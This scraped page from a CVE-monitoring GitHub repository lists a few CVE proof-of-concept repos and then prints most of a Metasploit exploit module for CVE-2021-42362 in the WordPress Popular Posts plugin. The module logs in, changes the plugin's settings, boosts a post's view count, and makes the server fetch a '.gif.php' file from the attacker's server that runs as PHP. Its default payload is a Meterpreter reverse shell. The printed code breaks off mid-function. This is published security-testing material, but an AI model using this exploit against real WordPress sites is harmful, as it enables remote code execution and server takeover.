A sample POC to test CVE-2021-30853 : shubham0d/CVE-2021-30853 create time: 2022-01-02T20:24:11Z

no description : thl-cmk/CVE-2021-44228-log4j-check_mk-plugin create time: 2021-12-19T10:46:53Z

CVE-2016-10555 PoC code : scent2d/PoC-CVE-2016-10555 create time: 2022-01-02T15:02:59Z

**### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"])/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"])/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"])/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "(?<wp_nonce>[^"])/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n

#{Rex::Text.rand_text_alphanumeric(100..200)}

\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com// (1..post_count).each do |c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { 'wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce

About

Automatic monitor github cve using Github Actions

p1ay8y3ar.github.io/cve_monitor/

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%